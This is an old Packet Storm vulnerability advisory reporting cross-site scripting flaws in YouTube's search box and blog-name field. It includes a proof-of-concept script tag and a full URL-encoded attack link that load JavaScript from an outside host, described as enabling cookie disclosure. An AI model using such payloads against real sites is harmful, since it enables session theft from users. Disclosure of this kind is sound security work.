youtube.txt

2006-06-26T00:00:00
ID PACKETSTORM:47649
Type packetstorm
Reporter Luny
Modified 2006-06-26T00:00:00

Description

                                        
                                            `Youtube.com  
  
Homepage:  
http://www.youtube.com  
  
Affected files:  
  
* Search box input  
* Adding a new blog:  
- Blog name  
  
  
XSS Vuln with cookie disclosure via search box:  
  
Data isn't sanatized when using the search box. For PoC input:  
  
<script src=http://www.youfucktard.com/xss.js></script>  
  
PoC link:  
http://www.youtube.com/results?search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E%3C%2FSCRIPT%3E&search_type=search_videos&search=Search  
  
Screenshots:  
http://www.youfucktard.com/xsp/youtube1.jpg  
------------------------------------------  
  
XSS vuln via blog name input box:  
  
Now, you tube allows you to add a blog to your profile, and one of the places they let you merge a blog is from blogspot.com. I auditing them a few days ago, and since you can use html in your blogs name amongst other things, this is dangerous for bringing it into youtube.  
  
Screenshots:  
  
http://www.youfucktard.com/xsp/youtube1.jpg  
http://www.youfucktard.com/xsp/youtube2.jpg  
http://www.youfucktard.com/xsp/youtube3.jpg  
`